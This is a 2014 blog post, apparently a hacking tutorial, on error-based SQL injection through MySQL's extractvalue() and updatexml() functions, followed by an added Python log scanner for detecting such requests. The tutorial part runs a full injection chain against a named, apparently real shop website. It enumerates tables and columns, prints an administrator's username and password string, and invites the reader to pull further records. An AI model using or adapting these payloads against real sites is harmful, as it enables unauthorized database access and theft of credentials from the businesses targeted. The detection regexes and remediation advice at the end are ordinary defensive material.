Sunday, May 18, 2014

Hacking XPath-style SQLi


Tutorial: XPath-style SQLi
Get version:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,version()))--
--> XPATH syntax error: '~5.5.36-cll'

Getting The Tables:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--
--> '~address_book'
We increase the limit to find the next table:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+1,1)))--
--> '~address_format'
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+2,1)))--
--> '~administrators' (here it is)

Getting Column:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+0,1)))--
--> '~id'
We increase the limit to find the next column:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+1,1)))--
--> '~user_name'
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+2,1)))--
--> '~user_password'

Getting Data:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+updatexml(0x7e,concat(0x7e,((select+concat(id,0x7e,user_name,0x7e,user_password)+from+administrators+limit+0,1))),0)--
--> '~3~offbroadwayboutique~37b93056a'
We increase the limit to find the next record :-)
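
For defenders: every request above depends on MySQL echoing the invalid XPath argument of `extractvalue()`/`updatexml()` in an error message that the page then displays, and that leaves a distinctive trace in web access logs. The following is an added example, not part of the original post, that flags such requests and the leaked error text; it assumes combined-format access logs, and the `/item.php` path, the IP addresses and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL XML functions used for error-based extraction in the requests above.
XPATH_FUNCS = re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)
# Supporting signals that appear in the same requests.
SIGNALS = {
    "concat_hex_marker": re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I),
    "schema_enumeration": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "limit_stepping": re.compile(r"\blimit\s+\d+\s*,\s*1\b", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# Error text that reaches the client when database errors are displayed.
LEAK = re.compile(r"XPATH syntax error: '[^']*'")
# Combined-log-format prefix: client IP and request target.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

def classify(target):
    """Return the signals found in one request target, or [] if none."""
    text = re.sub(r"\s+", " ", unquote_plus(target))  # decode %xx and '+'
    if not XPATH_FUNCS.search(text):
        return []
    return ["xpath_function"] + [n for n, rx in SIGNALS.items() if rx.search(text)]

def leaks_db_error(body):
    """True if a response body exposes the XPATH error text."""
    return bool(LEAK.search(body))

def scan(lines):
    """Group flagged requests by client IP: {ip: [(target, signals), ...]}."""
    hits = {}
    for line in lines:
        m = LOG_LINE.match(line)
        signals = classify(m.group("target")) if m else []
        if signals:
            hits.setdefault(m.group("ip"), []).append((m.group("target"), signals))
    return hits

# Constructed sample log (documentation IP ranges, hypothetical /item.php).
SAMPLE_LOG = [
    '198.51.100.20 - - [18/May/2014:10:00:00 +0000] "GET /item.php?id=6 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [18/May/2014:10:00:01 +0000] "GET /item.php?id=6+and+extractvalue(rand(),concat(0x7e,version()))-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/May/2014:10:00:05 +0000] "GET /item.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+2,1)))-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/May/2014:10:00:09 +0000] "GET /item.php?id=6+and+updatexml%280x7e,concat%280x7e,%28select+user_name+from+administrators+limit+0,1%29%29,0%29-- HTTP/1.1" 200 512',
    '198.51.100.20 - - [18/May/2014:10:00:12 +0000] "GET /search.php?q=updatexml+docs HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, reqs in scan(SAMPLE_LOG).items():
        for target, signals in reqs:
            print(ip, ",".join(signals), target[:60])
```

Log matching only shows that probing happened; the fix on the application side is to bind `id` as a parameter in a prepared statement and to stop returning database error text to the client.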
